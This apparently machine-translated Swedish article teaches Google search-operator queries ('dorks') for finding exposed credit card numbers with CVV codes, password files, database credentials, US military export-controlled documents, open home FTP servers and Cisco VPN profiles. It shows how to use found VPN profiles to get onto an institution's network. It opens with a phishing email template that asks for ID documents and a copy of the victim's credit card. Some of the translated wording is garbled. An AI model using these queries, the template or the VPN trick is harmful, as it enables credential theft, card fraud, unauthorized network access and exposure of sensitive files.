    Bästa FName LName, Vi behandlar din beställning. Som en del av våra säkerhetsrutiner ber vi dig att tillhandahålla följande dokument: 1) Din giltiga fotolegitimation (t.ex. pass eller körkort). 2) En elräkning eller kontoutdrag utfärdat på ditt namn, som visar din nuvarande adress. Observera att sådant endast kan accepteras om det är daterat inte längre än 3 månader tillbaka från det aktuella datumet. 3) Kopia av ditt kreditkort (fram- och baksida). När ditt ID och din elräkning har verifierats kommer de att placeras i en säker fil och du kommer inte att bli ombedd att skicka den igen i framtiden. Skicka dina dokument på e-post till Observera att om vi efter 2 dagar inte får läsbar e-post, kommer vi att annullera din beställning.


    # Tester utfördes över Indien. Svaret var cirka 40 %.
    # Alla dokument som erhållits på detta sätt raderades och butiker underrättades om sårbarheten.
    # Artikeln skrevs endast i informationssyfte. Jag uppmuntrar dig inte på något sätt att vidta åtgärder.

    Att skaffa privata data innebär inte alltid hacking – ibland publiceras det offentligt. Kunskap om Google-inställningar och lite uppfinningsrikedom gör att du kan hitta många intressanta saker - från kreditkortsnummer till FBI-dokument.

    VARNING All information tillhandahålls endast i informationssyfte. Varken redaktörerna eller författaren är ansvariga för eventuell skada orsakad av materialet i denna artikel.

    Idag är allt anslutet till Internet, med liten oro för att begränsa åtkomsten. Därför blir många privata data sökmotorernas offer. Spindelrobotar är inte längre begränsade till webbsidor, utan indexerar allt innehåll som finns på Internet och lägger ständigt till icke-offentlig information till sina databaser. Att ta reda på dessa hemligheter är lätt - du behöver bara veta hur man frågar om dem.

    Letar efter filer

    I kapabla händer hittar Google snabbt allt som inte finns på Internet, till exempel personlig information och filer för officiellt bruk. De är ofta gömda som en nyckel under en matta: det finns inga egentliga åtkomstbegränsningar, uppgifterna ligger helt enkelt på baksidan av sajten, dit inga länkar leder. Googles standardwebbgränssnitt ger bara grundläggande avancerade sökinställningar, men även dessa kommer att räcka.

    Du kan begränsa din Google-sökning till en specifik filtyp med två operatorer: filtyp och ext . Den första anger formatet som sökmotorn bestämde från filtiteln, den andra anger filtillägget, oavsett dess interna innehåll. När du söker i båda fallen behöver du bara ange tillägget. Till en början var ext-operatorn bekväm att använda i fall där filen inte hade specifika formategenskaper (till exempel för att söka efter ini- och cfg-konfigurationsfiler, som kunde innehålla vad som helst). Nu har Googles algoritmer förändrats, och det finns ingen synlig skillnad mellan operatörerna – i de flesta fall är resultaten desamma.


    Filtrera resultaten

    Som standard söker Google efter ord och i allmänhet alla inmatade tecken i alla filer på indexerade sidor. Du kan begränsa sökområdet efter toppdomän, en specifik webbplats eller platsen för söksekvensen i själva filerna. För de två första alternativen, använd webbplatsoperatören, följt av namnet på domänen eller den valda webbplatsen. I det tredje fallet låter en hel uppsättning operatörer dig söka efter information i tjänstefält och metadata. Till exempel kommer allinurl att hitta den givna i själva länkarna, allinanchor - i texten utrustad med taggen , allintitle - i sidtitlar, allintext - i brödtexten.

    För varje operatör finns en lättviktsversion med ett kortare namn (utan prefixet all). Skillnaden är att allinurl hittar länkar med alla ord, och inurl hittar bara länkar med det första av dem. Det andra och efterföljande orden från frågan kan visas var som helst på webbsidor. Inurl-operatören skiljer sig också från en annan operatör med liknande betydelse - site. Den första låter dig också hitta vilken sekvens av tecken som helst i en länk till det sökta dokumentet (till exempel /cgi-bin/), som används flitigt för att hitta komponenter med kända sårbarheter.

    Låt oss prova det i praktiken. Vi tar allintext-filtret och gör att begäran producerar en lista med nummer och verifieringskoder för kreditkort som kommer att förfalla först om två år (eller när deras ägare tröttnar på att mata alla).

    Allintext: kortnummer utgångsdatum /2017 cvv

    När du läser i nyheterna att en ung hacker "hackade in på servrarna" hos Pentagon eller NASA och stal hemligstämplad information, talar vi i de flesta fall om just en sådan grundläggande teknik för att använda Google. Anta att vi är intresserade av en lista över NASA-anställda och deras kontaktinformation. Säkert finns en sådan lista tillgänglig i elektronisk form. För enkelhetens skull eller på grund av förbiseende kan det också finnas på själva organisationens webbplats. Det är logiskt att det i det här fallet inte kommer att finnas några länkar till det, eftersom det är avsett för internt bruk. Vilka ord kan finnas i en sådan fil? Åtminstone - fältet "adress". Att testa alla dessa antaganden är lätt.


    Inurl:nasa.gov filtyp:xlsx "adress"


    Vi använder byråkrati

    Fynd som detta är en fin touch. En verkligt solid fångst tillhandahålls av en mer detaljerad kunskap om Googles operatörer för webbansvariga, själva nätverket och särdragen i strukturen för det som eftersträvas. Genom att känna till detaljerna kan du enkelt filtrera resultaten och förfina egenskaperna för de nödvändiga filerna för att få verkligt värdefull data i resten. Det är roligt att byråkratin kommer till undsättning här. Den producerar standardformuleringar som är bekväma för att söka efter hemlig information som av misstag läckt ut på Internet.

    Till exempel betyder distributionsstämpeln, som krävs av det amerikanska försvarsdepartementet, standardiserade restriktioner för distributionen av ett dokument. Bokstaven A betecknar offentliga offentliggöranden där det inte finns något hemligt; B - endast avsedd för internt bruk, C - strikt konfidentiell, och så vidare tills F. Bokstaven X sticker ut separat, vilket markerar särskilt värdefull information som representerar en statshemlighet av högsta nivå. Låt de som ska göra detta i tjänst söka efter sådana dokument, så begränsar vi oss till filer med bokstaven C. Enligt DoDI-direktivet 5230.24 tilldelas denna märkning dokument som innehåller en beskrivning av kritiska teknologier som faller under exportkontroll . Du kan hitta sådan noggrant skyddad information på webbplatser i toppdomänen.mil, tilldelad för den amerikanska armén.

    "DISTRIBUTIONSUTTALANDE C" inurl:navy.mil

    Det är mycket bekvämt att .mil-domänen endast innehåller webbplatser från det amerikanska försvarsdepartementet och dess kontraktsorganisationer. Sökresultat med en domänbegränsning är exceptionellt rena, och titlarna talar för sig själva. Att söka efter ryska hemligheter på detta sätt är praktiskt taget värdelöst: kaos råder i domains.ru and.rf, och namnen på många vapensystem låter som botaniska (PP "Kiparis", självgående vapen "Akatsia") eller till och med fantastiska ( TOS "Buratino").


    Genom att noggrant studera alla dokument från en webbplats i .mil-domänen kan du se andra markörer för att förfina din sökning. Till exempel en hänvisning till exportrestriktionerna "Sec 2751", som också är praktiskt för att söka efter intressant teknisk information. Då och då tas den bort från officiella webbplatser där den en gång dök upp, så om du inte kan följa en intressant länk i sökresultaten, använd Googles cache (cache-operator) eller webbplatsen Internet Archive.

    Att klättra upp i molnen

    Förutom oavsiktligt avvisade myndighetsdokument, dyker ibland upp länkar till personliga filer från Dropbox och andra datalagringstjänster som skapar "privata" länkar till offentligt publicerade data i Googles cache. Det är ännu värre med alternativa och hemgjorda tjänster. Till exempel hittar följande fråga data för alla Verizon-kunder som har en FTP-server installerad och aktivt använder sin router.

    Allinurl:ftp:// verizon.net

    Det finns nu mer än fyrtio tusen sådana smarta människor, och våren 2015 var det många fler av dem. Istället för Verizon.net kan du ersätta namnet på vilken välkänd leverantör som helst, och ju mer känt det är, desto större kan fångsten bli. Genom den inbyggda FTP-servern kan du se filer på en extern lagringsenhet ansluten till routern. Vanligtvis är detta en NAS för fjärrarbete, ett personligt moln eller någon form av peer-to-peer-filnedladdning. Allt innehåll på sådana medier indexeras av Google och andra sökmotorer, så du kan komma åt filer som lagras på externa enheter via en direktlänk.

    Tittar på konfigurationerna

    Innan den utbredda migreringen till molnet styrde enkla FTP-servrar som fjärrlagring, som också hade en hel del sårbarheter. Många av dem är fortfarande aktuella idag. Till exempel lagrar det populära WS_FTP Professional-programmet konfigurationsdata, användarkonton och lösenord i filen ws_ftp.ini. Det är lätt att hitta och läsa, eftersom alla poster sparas i textformat och lösenord krypteras med Triple DES-algoritmen efter minimal förvirring. I de flesta versioner är det tillräckligt att bara kassera den första byten.

    Det är lätt att dekryptera sådana lösenord med hjälp av verktyget WS_FTP Password Decryptor eller en gratis webbtjänst.

    När man talar om att hacka en godtycklig webbplats betyder de vanligtvis att man skaffar ett lösenord från loggar och säkerhetskopior av konfigurationsfiler för CMS eller e-handelsapplikationer. Om du känner till deras typiska struktur kan du enkelt ange nyckelorden. Rader som de som finns i ws_ftp.ini är extremt vanliga. Till exempel, i Drupal och PrestaShop finns det alltid en användaridentifierare (UID) och ett motsvarande lösenord (pwd), och all information lagras i filer med tillägget .inc. Du kan söka efter dem enligt följande:

    "pwd=" "UID=" ext:inc

    Avslöja DBMS-lösenord

    I SQL-servrarnas konfigurationsfiler lagras användarnamn och e-postadresser i klartext, och deras MD5-hashar skrivs istället för lösenord. Strängt taget är det omöjligt att dekryptera dem, men du kan hitta en matchning bland de kända hash-lösenordsparen.

    Det finns fortfarande DBMS som inte ens använder lösenordshashning. Konfigurationsfilerna för någon av dem kan enkelt ses i webbläsaren.

    Intext:DB_PASSWORD filtyp:env

    Med tillkomsten av Windows-servrar togs platsen för konfigurationsfiler delvis av registret. Du kan söka igenom dess grenar på exakt samma sätt, med reg som filtyp. Till exempel, så här:

    Filtyp:reg HKEY_CURRENT_USER "Lösenord"=

    Låt oss inte glömma det uppenbara

    Ibland är det möjligt att komma till hemligstämplad information med hjälp av data som av misstag öppnades och kom till Googles kännedom. Det perfekta alternativet är att hitta en lista med lösenord i något vanligt format. Endast desperata människor kan lagra kontoinformation i en textfil, Word-dokument eller Excel-kalkylblad, men det finns alltid tillräckligt med dem.

    Filtyp:xls inurl:lösenord

    Å ena sidan finns det många medel för att förhindra sådana incidenter. Det är nödvändigt att specificera adekvata åtkomsträttigheter i htaccess, patcha CMS, inte använda vänsterhänta skript och stänga andra hål. Det finns också en fil med en lista över robots.txt-undantag som förbjuder sökmotorer att indexera de filer och kataloger som anges i den. Å andra sidan, om strukturen för robots.txt på någon server skiljer sig från standarden, blir det omedelbart klart vad de försöker dölja på den.

    Listan över kataloger och filer på alla webbplatser föregås av standardindexet för. Eftersom det för tjänsteändamål måste finnas i titeln, är det meningsfullt att begränsa sökningen till intitle-operatören. Intressanta saker finns i katalogerna /admin/, /personal/, /etc/ och till och med /secret/.

    Håll utkik efter uppdateringar

    Relevans är oerhört viktigt här: gamla sårbarheter stängs väldigt långsamt, men Google och dess sökresultat förändras ständigt. Det finns till och med en skillnad mellan ett "sista sekund"-filter (&tbs=qdr:s i slutet av webbadressen för begäran) och ett "realtidsfilter" (&tbs=qdr:1).

    Tidsintervallet för datumet för den senaste uppdateringen av filen anges också implicit av Google. Genom det grafiska webbgränssnittet kan du välja en av standardperioderna (timme, dag, vecka, etc.) eller ställa in ett datumintervall, men denna metod är inte lämplig för automatisering.

    Från utseendet på adressfältet kan du bara gissa om ett sätt att begränsa resultatet av resultat med &tbs=qdr:-konstruktionen. Bokstaven y efter den sätter gränsen på ett år (&tbs=qdr:y), m visar resultaten för den senaste månaden, w - för veckan, d - för den senaste dagen, h - för den senaste timmen, n - för minuten, och s - för ge mig en sekund. De senaste resultaten som Google just har gjort kända hittas med filtret &tbs=qdr:1 .

    Om du behöver skriva ett smart skript är det användbart att veta att datumintervallet är inställt i Google i julianskt format med hjälp av daterange-operatorn. Så här kan du till exempel hitta en lista över PDF-dokument med ordet konfidentiell, nedladdade från 1 januari till 1 juli 2015.

    Konfidentiell filtyp:pdf datumområde:2457024-2457205

    Intervallet anges i julianskt datumformat utan att ta hänsyn till bråkdelen. Att översätta dem manuellt från den gregorianska kalendern är obekvämt. Det är lättare att använda en datumomvandlare.

    Inriktning och filtrering igen

    Förutom att ange ytterligare operatorer i sökfrågan kan de skickas direkt i länkens brödtext. Till exempel motsvarar filtyp:pdf-specifikationen konstruktionen as_filetype=pdf . Detta gör det bekvämt att fråga eventuella förtydliganden. Låt oss säga att resultatet av resultat endast från Republiken Honduras specificeras genom att lägga till konstruktionen cr=countryHN i sökwebbadressen, och endast från staden Bobruisk - gcs=Bobruisk. Du kan hitta en komplett lista i utvecklarsektionen.

    Googles automationsverktyg är utformade för att göra livet enklare, men de skapar ofta problem. Till exempel bestäms användarens stad av användarens IP genom WHOIS. Baserat på denna information balanserar Google inte bara belastningen mellan servrar, utan ändrar också sökresultaten. Beroende på region, för samma begäran, kommer olika resultat att visas på första sidan, och några av dem kan vara helt dolda. Koden på två bokstäver efter gl=country-direktivet hjälper dig att känna dig som en kosmopolit och söka information från vilket land som helst. Nederländernas kod är till exempel NL, men Vatikanen och Nordkorea har ingen egen kod i Google.

    Ofta blir sökresultaten röriga även efter att ha använt flera avancerade filter. I det här fallet är det lätt att förtydliga begäran genom att lägga till flera undantagsord till den (ett minustecken placeras framför var och en av dem). Till exempel används banktjänster, namn och handledning ofta med ordet Personal. Därför kommer renare sökresultat inte att visas av ett läroboksexempel på en fråga, utan av ett förfinat:

    Intitle:"Index för /Personligt/" -namn -tutorial -bank

    Ett sista exempel

    En sofistikerad hacker kännetecknas av att han förser sig själv med allt han behöver på egen hand. Till exempel är VPN en bekväm sak, men antingen dyrt eller tillfälligt och med restriktioner. Att teckna ett abonnemang för dig själv är för dyrt. Det är bra att det finns gruppabonnemang och med hjälp av Google är det lätt att bli en del av en grupp. För att göra detta, hitta bara Cisco VPN-konfigurationsfilen, som har ett ganska icke-standardiserat PCF-tillägg och en igenkännbar sökväg: Program Files\Cisco Systems\VPN Client\Profiles. En förfrågan och du går med, till exempel, det vänliga teamet vid universitetet i Bonn.

    Filtyp:pcf vpn ELLER Grupp

    INFO Google hittar konfigurationsfiler med lösenord, men många av dem är skrivna i krypterad form eller ersatta med hash. Om du ser strängar med en fast längd, leta omedelbart efter en dekrypteringstjänst.

    Lösenord lagras krypterade, men Maurice Massard har redan skrivit ett program för att dekryptera dem och tillhandahåller det gratis via thecampusgeeks.com.

    Google kör hundratals olika typer av attacker och penetrationstester. Det finns många alternativ som påverkar populära program, stora databasformat, många sårbarheter i PHP, moln och så vidare. Att veta exakt vad du letar efter kommer att göra det mycket lättare att hitta den information du behöver (särskilt information som du inte hade för avsikt att offentliggöra). Shodan är inte den enda som matar med intressanta idéer, utan varje databas med indexerade nätverksresurser!





    

    2024 gtavrl.ru.